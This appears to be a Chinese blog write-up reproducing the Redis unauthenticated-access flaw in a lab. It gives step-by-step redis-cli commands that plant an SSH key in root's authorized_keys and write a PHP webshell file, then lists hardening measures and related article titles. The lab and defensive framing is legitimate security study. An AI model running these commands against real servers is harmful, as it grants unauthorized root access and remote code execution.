Redis v6.0.5未授權訪問漏洞復現
Redis因配置不當和未授權訪問。導致無需認證就可以訪問到內部資料,可導致敏感資訊洩露,也可以通過config 命令,可以進行寫檔案作操。
復現環境:
伺服器: Centos 7.5 Redis Server
redis v6.0.5
redis.conf 檔案以下兩處進行修改
1、註釋掉 bind 127.0.0.1
2、protected-mode no
攻擊機:Centsos 7.5 Redis Client
復現過程:
1、 服務端啟動 redis server
2、攻擊機連線server
./src/redis-cli -h 192.168.195.110
預設用6379埠登陸
無需認證即可登陸到server,並可執行命令。
3、攻擊機上ssh-keygen生成公鑰和私鑰,將公鑰寫入伺服器,使用私鑰登陸,
一路按回車即可,預設是 rsa 型別的金鑰
4、將公鑰內容複製
[root@centos7200 ~]# cat /root/.ssh/id_rsa.pub 檢視後複製內容
5、通過redis-cli登陸到server 後,輸入以下命令:
192.168.195.110:6379> config set dir /root/.ssh/ 將備份路徑設為/root/.ssh/
192.168.195.110:6379> config set dbfilename authorized_keys
將複製的id_rsa.pub內容貼上進來
192.168.195.110:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADARsYKq6juYwzKvVj1oq部分馬塞克V84EvYaRctI3QhQPJcz5DTD/7jG2Hn3fjt+mj/wB root@centos7-200\n\n\n"
192.168.195.110:6379>save
6、攻擊機可以通過 ssh 免密登陸到server
7、如果Server上開啟了web服務,可以寫webshell,
開啟httpd服務:
登陸伺服器後執行以下命令:
192.168.195.110:6379> config set dir /var/www/html
OK
192.168.195.110:6379> config set dbfilename webshell.php
OK
192.168.195.110:6379> set x “<?php phpinfo(); ?>”
OK
192.168.195.110:6379> save
OK
訪問wehshell.php
防護措施
1、為Redis服務單獨建立 user和home目錄,低許可權執行,並且配置禁止登陸
2、為Redis新增密碼驗證
可以通過修改redis.conf檔案來為Redis新增密碼驗證
requirepass mypassword
3、禁止外網訪問 Redis
可以通過修改redis.conf檔案來使得Redis服務只在當前主機可用
bind 127.0.0.1
4、啟動 保護模式
protected-mode yes
相關文章
- Redis未授權漏洞復現Redis
- Redis未授權訪問漏洞利用總結Redis
- 銘說 | Redis未授權訪問漏洞GetshellRedis
- 利用redis未授權訪問漏洞(windows版)RedisWindows
- 系統滲透漏洞の未授權訪問
- JBOSS未授權訪問
- Java安全漏洞:Druid未授權訪問解決JavaUI
- Linux sudo 漏洞可能導致未經授權的特權訪問Linux
- 利用CouchDB未授權訪問漏洞執行任意系統命令
- 多款Intel產品未授權訪問漏洞(CVE-2017-5689)Intel
- Druid未授權訪問實戰利用UI
- 從零開始學習各種常見未授權訪問漏洞
- spark未授權RCE漏洞Spark
- SaltStack未授權訪問及命令執行漏洞分析(CVE-2020-16846/25592)
- Etcd REST API 未授權訪問漏洞暴露 750MB 密碼和金鑰RESTAPI密碼
- 記一次特別的未授權訪問
- 【雲原生攻防研究】Istio訪問授權再曝高危漏洞
- CVE-2021-45232 Apache APISIX 從未授權訪問到RCEApacheAPI
- SSRF結合Redis未授權的打法Redis
- 偶然發現的bug————越權訪問漏洞追溯
- php反序列化和redis未授權PHPRedis
- Hadoop Yarn REST API未授權漏洞利用挖礦分析HadoopYarnRESTAPI
- pgAdmin未授權命令執行漏洞(CVE-2022-4223)
- mysql8.0授權root遠端訪問MySql
- Flipboard 資料庫未經授權訪問使用者賬號密碼洩露資料庫密碼
- 瞭解如何使用JSON Web令牌(JWT)實現訪問授權驗證JSONWebJWT
- 【漏洞復現】ThinkAdmin v5和v6 未授權列目錄任意檔案讀取(CVE-2020-25540)
- cve-2019-11581 Atlassian Jira未授權服務端模板注入漏洞服務端
- MyEclipse2017新增github連線未授權問題EclipseGithub
- [BUG反饋]許可權管理 -> 訪問授權 點選後報錯
- kubernetes 原始碼安裝1.18.3 (8)授權 apiserver 訪問 kubelet原始碼APIServer
- [BUG反饋]分類授權漏洞
- windwos提權漏洞CVE-2023-21746復現(LocalPotato)
- shell給授權檔案新增私鑰並修改訪問修改時間
- 容器編排系統K8s之訪問控制--RBAC授權K8S
- Linux 髒管道kernel提權漏洞復現及修復(CVE-2022-0847)Linux
- 阿里雲安全組規則授權物件設定為固定IP段訪問阿里物件
- golang對接阿里雲私有Bucket上傳圖片、授權訪問圖片Golang阿里